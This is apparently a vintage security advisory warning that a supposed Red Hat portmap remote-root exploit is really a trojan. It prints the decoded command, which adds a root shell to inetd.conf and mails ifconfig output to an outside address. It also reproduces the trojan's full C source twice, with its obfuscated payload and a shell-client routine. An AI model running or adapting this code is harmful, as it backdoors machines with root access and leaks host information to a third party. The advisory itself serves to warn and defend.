COMMAND
portmap exploit trojans
SYSTEMS AFFECTED
Those without enough knowledge
PROBLEM
'goatkiller' warned about following. There are trojan being
spread to clueless kiddies, claims to exploit portmap on Redhat
boxes, really adds a rootshell to your inetd.conf file and sends
other info like your ip address by executing ifconfig, it sends
this mail to goat187@hotmail.com. The actual "shellcode" that
gets executed follows:
/bin/echo "65139 stream tcp nowait root /bin/sh sh -i" >>
/etc/inetd.conf ; /bin/killall -1 inetd 2>&1 1>/dev/null ;
/sbin/ifconfig -a | mail goat187@hotmail.com 2>&1 2>/dev/null
Codes below are samples of said above:
/*
Do not run unless you know what you are doing , and DONT RUN IT
AS ROOT. It Puts a ROOTSHELL in your inetd.conf and mails them
your IP address.
PRIVATE !!! DO NOT DISTRIBUTE THIS !!! PRIVATE (DOnT RUN its a
TROJAN)
portmap remote root linux exploit (TROJAN) (no stack patch)
by horizon - jmcdonald@unf.edu
This was tested against redhat box with 2.2.9 kernel.
(shouldn't need offset)
BIG thanks to stran9er who wrote this shellcode!!
greets to: #!ADM and users @ el8.org ;)
*/
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <rpc/rpc.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/time.h>
#include <sys/types.h>
#include <unistd.h>
#define NOP 0x90
#define RET 0xbfffec90
#define PORT 5760
#define pmap_proc_p system
char *shellcode =
"\x64\x97\x9e\xa3\x64\x9a\x98\x9d\xa4\x55\x57\x6b\x6a\x66\x68\x6e\x55\xa8\xa9"
"\xa7\x9a\x96\xa2\x55\xa9\x98\xa5\x55\xa3\xa4\xac\x96\x9e\xa9\x55\xa7\xa4\xa4"
"\xa9\x55\x64\x97\x9e\xa3\x64\xa8\x9d\x55\xa8\x9d\x55\x62\x9e\x57\x55\x73\x73"
"\x55\x64\x9a\xa9\x98\x64\x9e\xa3\x9a\xa9\x99\x63\x98\xa4\xa3\x9b\x55\x70\x55"
"\x64\x97\x9e\xa3\x64\xa0\x9e\xa1\xa1\x96\xa1\xa1\x55\x62\x66\x55\x9e\xa3\x9a"
"\xa9\x99\x55\x67\x73\x5b\x66\x55\x66\x73\x64\x99\x9a\xab\x64\xa3\xaa\xa1\xa1"
"\x55\x70\x55\x64\xa8\x97\x9e\xa3\x64\x9e\x9b\x98\xa4\xa3\x9b\x9e\x9c\x55\x62"
"\x96\x55\xb1\x55\xa2\x96\x9e\xa1\x55\x9c\xa4\x96\xa9\x66\x6d\x6c\x75\x9d\xa4"
"\xa9\xa2\x96\x9e\xa1\x63\x98\xa4\xa2\x55\x67\x73\x5b\x66\x55\x67\x73\x64\x99"
"\x9a\xab\x64\xa3\xaa\xa1\xa1\x3f";
int max(int x, int y)
{
if(x > y)
return(x);
return(y);
}
void rshell(char *host)
{
int sockfd, maxfd, n;
struct sockaddr_in cli;
char sendln[1024], recvln[1024];
struct hostent *hp;
fd_set rset;
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
perror("socket");
exit(-1);
}
if((hp = gethostbyname(host)) == NULL){
perror("gethostbyname");
exit(-1);
}
bzero(&cli, sizeof(cli));
cli.sin_family = AF_INET;
cli.sin_port = htons(PORT);
cli.sin_addr.s_addr = inet_addr(host);
if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0){
perror("connect");
exit(-1);
}
printf("root shell found!\n");
strcpy(sendln, "uname -a; pwd; id;\n");
write(sockfd, sendln, strlen(sendln));
FD_ZERO(&rset);
for(;;){
FD_SET(fileno(stdin), &rset);
FD_SET(sockfd, &rset);
maxfd = max(fileno(stdin), sockfd) + 1;
select(maxfd, &rset, NULL, NULL, NULL);
if(FD_ISSET(fileno(stdin), &rset)){
bzero(sendln, sizeof(sendln));
fgets(sendln, sizeof(sendln)-2, stdin);
write(sockfd, sendln, strlen(sendln));
}
if(FD_ISSET(sockfd, &rset)){
bzero(recvln, sizeof(recvln));
if((n = read(sockfd, recvln, sizeof(recvln))) ==
0){
printf("Connection closed.\n");
exit(0);
}
if(n < 0){
perror("read");
exit(-1);
}
fputs(recvln, stdout);
}
}
}
void main(int argc, char **argv)
{
CLIENT *cli;
int i = 0, offset = 53;
char *portmap;
char *buf;
if(argc < 2){
printf("usage: %s <ip> [offset]\n", argv[0]);
exit(-1);
}
if((portmap = (char *) malloc(154)) == NULL) {
perror("malloc");
}
while(*shellcode) {
portmap[i] = *shellcode - offset;
shellcode++; i++;
}
pmap_proc_p(portmap);
printf("sending shellcode... connecting to remote host\n");
rshell(argv[1]);
strcpy(buf, portmap);
exit(-1);
}
---------------------------------------SNIP------------Snip----
/*
PRIVATE !!! DO NOT DISTRIBUTE THIS !!! PRIVATE
portmap remote root linux exploit (no stack patch)
by horizon - jmcdonald@unf.edu
This was tested against redhat box with 2.2.9 kernel.
(shouldn't need offset)
BIG thanks to stran9er who wrote this shellcode!!
greets to: #!ADM and users @ el8.org ;)
*/
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <rpc/rpc.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/time.h>
#include <sys/types.h>
#include <unistd.h>
#define NOP 0x90
#define RET 0xbfffec90
#define PORT 5760
#define pmap_proc_p system
char *shellcode =
"\x64\x97\x9e\xa3\x64\x9a\x98\x9d\xa4\x55\x57\x6b\x6a\x66\x68\x6e\x55\xa8\xa9"
"\xa7\x9a\x96\xa2\x55\xa9\x98\xa5\x55\xa3\xa4\xac\x96\x9e\xa9\x55\xa7\xa4\xa4"
"\xa9\x55\x64\x97\x9e\xa3\x64\xa8\x9d\x55\xa8\x9d\x55\x62\x9e\x57\x55\x73\x73"
"\x55\x64\x9a\xa9\x98\x64\x9e\xa3\x9a\xa9\x99\x63\x98\xa4\xa3\x9b\x55\x70\x55"
"\x64\x97\x9e\xa3\x64\xa0\x9e\xa1\xa1\x96\xa1\xa1\x55\x62\x66\x55\x9e\xa3\x9a"
"\xa9\x99\x55\x67\x73\x5b\x66\x55\x66\x73\x64\x99\x9a\xab\x64\xa3\xaa\xa1\xa1"
"\x55\x70\x55\x64\xa8\x97\x9e\xa3\x64\x9e\x9b\x98\xa4\xa3\x9b\x9e\x9c\x55\x62"
"\x96\x55\xb1\x55\xa2\x96\x9e\xa1\x55\x9c\xa4\x96\xa9\x66\x6d\x6c\x75\x9d\xa4"
"\xa9\xa2\x96\x9e\xa1\x63\x98\xa4\xa2\x55\x67\x73\x5b\x66\x55\x67\x73\x64\x99"
"\x9a\xab\x64\xa3\xaa\xa1\xa1\x3f";
int max(int x, int y)
{
if(x > y)
return(x);
return(y);
}
void rshell(char *host)
{
int sockfd, maxfd, n;
struct sockaddr_in cli;
char sendln[1024], recvln[1024];
struct hostent *hp;
fd_set rset;
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
perror("socket");
exit(-1);
}
if((hp = gethostbyname(host)) == NULL){
perror("gethostbyname");
exit(-1);
}
bzero(&cli, sizeof(cli));
cli.sin_family = AF_INET;
cli.sin_port = htons(PORT);
cli.sin_addr.s_addr = inet_addr(host);
if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0){
perror("connect");
exit(-1);
}
printf("root shell found!\n");
strcpy(sendln, "uname -a; pwd; id;\n");
write(sockfd, sendln, strlen(sendln));
FD_ZERO(&rset);
for(;;){
FD_SET(fileno(stdin), &rset);
FD_SET(sockfd, &rset);
maxfd = max(fileno(stdin), sockfd) + 1;
select(maxfd, &rset, NULL, NULL, NULL);
if(FD_ISSET(fileno(stdin), &rset)){
bzero(sendln, sizeof(sendln));
fgets(sendln, sizeof(sendln)-2, stdin);
write(sockfd, sendln, strlen(sendln));
}
if(FD_ISSET(sockfd, &rset)){
bzero(recvln, sizeof(recvln));
if((n = read(sockfd, recvln, sizeof(recvln))) == 0){
printf("Connection closed.\n");
exit(0);
}
if(n < 0){
perror("read");
exit(-1);
}
fputs(recvln, stdout);
}
}
}
void main(int argc, char **argv)
{
CLIENT *cli;
int i = 0, offset = 53;
char *portmap;
char *buf;
if(argc < 2){
printf("usage: %s <ip> [offset]\n", argv[0]);
exit(-1);
}
if((portmap = (char *) malloc(154)) == NULL) {
perror("malloc");
}
while(*shellcode) {
portmap[i] = *shellcode - offset;
shellcode++; i++;
}
pmap_proc_p(portmap);
printf("sending shellcode... connecting to remote host\n");
rshell(argv[1]);
strcpy(buf, portmap);
exit(-1);
}
SOLUTION
Nothing. Don't be clueless. ADM isaware of at least a few
ADM-like trojan horses: ADMnlockd portmap.c ADMmountd2.tgz
Those have NOT been written by them. This last one includes a
worm, be very careful. ADM has set up a 'FAKES' archive on our
official ftp server. You can find all those fake ADM exploits at:
ftp://adm.freelsd.net/pub/ADM/FAKES/